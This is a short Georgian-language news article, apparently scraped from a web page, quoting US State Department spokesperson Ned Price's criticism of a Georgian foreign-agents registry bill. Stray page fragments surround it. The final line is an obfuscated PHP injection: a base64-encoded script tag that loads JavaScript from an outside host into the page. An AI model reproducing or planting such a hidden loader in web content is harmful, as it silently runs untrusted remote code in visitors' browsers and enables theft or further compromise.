celsiusi
ავერსი საქკაბელი
ამერიკის სახელმწიფო დეპარტამენტის პრესსპიკერი საქართველოს პარლამენტში შესულ კანონპროექტს გამოეხმაურა უცხოური გავლენის გამჭვირვალობის შესახებ, რომლის თანახმადაც, უნდა შეიქმნას უცხოური გავლენის აგენტების რეესტრი.
„ჩვენ გვაქვს შეშფოთებები. ჩვენ გვაქვს ღრმა შეშფოთებები. გვაქვს ინფორმაცია საქართველოს პარლამენტში შესულ კანონპროექტზე და ღრმად გვაშფოთებს მისი შესაძლო შედეგები სიტყვის თავისუფლებასა და დემოკრატიაზე საქართველოში. ჩვენ ეს შეშფოთებები გავუზიარეთ საქართველოს მთავრობას. შემოთავაზებული კანონი გარიყავს და გააჩუმებს დამოუკიდებელ ხმას საქართველოს მოქალაქეებისა, რომლებიც თავიანთი საზოგადოებისთვის უკეთესი მომავლის შესაქმნელად იღწვიან. ჩვენ გვჯერა, რომ მსგავსი კანონი პოტენციურ საფრთხეს შეუქმნის საქართველოს ევროატლანტიკურ ინტეგრაციას.
განცხადებები იმის შესახებ, რომ ეს კანონპროექტი დაფუძნებულია შეერთებულ შტატებში არსებული უცხოელი აგენტების რეგისტრაციის აქტზე FARA, აშკარად მცდარია. მეტიც, ეს კანონპროექტი ჩანს, რომ ეფუძნება მსგავს რუსულ და უნგრულ კანონმდებლობას და არა FARA-ს ან რომელიმე ამერიკულ კანონმდებლობას.” – განაცხადა ნედ პრაისმა.
249
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");